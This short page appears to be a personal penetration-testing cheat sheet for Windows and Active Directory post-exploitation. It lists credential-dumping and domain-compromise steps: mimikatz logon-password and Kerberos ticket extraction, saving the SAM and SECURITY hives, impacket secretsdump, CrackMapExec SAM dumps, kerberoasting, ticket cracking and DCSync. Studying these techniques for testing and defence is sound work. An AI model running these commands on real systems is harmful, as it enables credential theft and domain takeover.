Post Exploitation
mimikatz sekurlsa::logonPasswords
mimikatz kerberos::tickets
mimikatz kerberos::list /export
reg save hklm\sam (system/security)
Sharphound
AD tools collection: https://github.com/expl0itabl3/Toolies
neo4j
Kirbi2john/ hashcat for ticket cracking
GMSAPassword
impacket-psexec
Crackmapexec dump SAM with --sam
impacket-secretsdump with psexec format to dump sam and ntds directly
impacket-secretsdump with SAM and SECURITY hive
Find kerberoastable accounts with bloodhound
DCSync attack with WriteDacl/Exchange Windows Permissions permission, use powerview (HTB Forest, iammainul medium)
DCSync with local admin priv, we can use lsadump::dcsync /user:target_user mimikatz
Last updated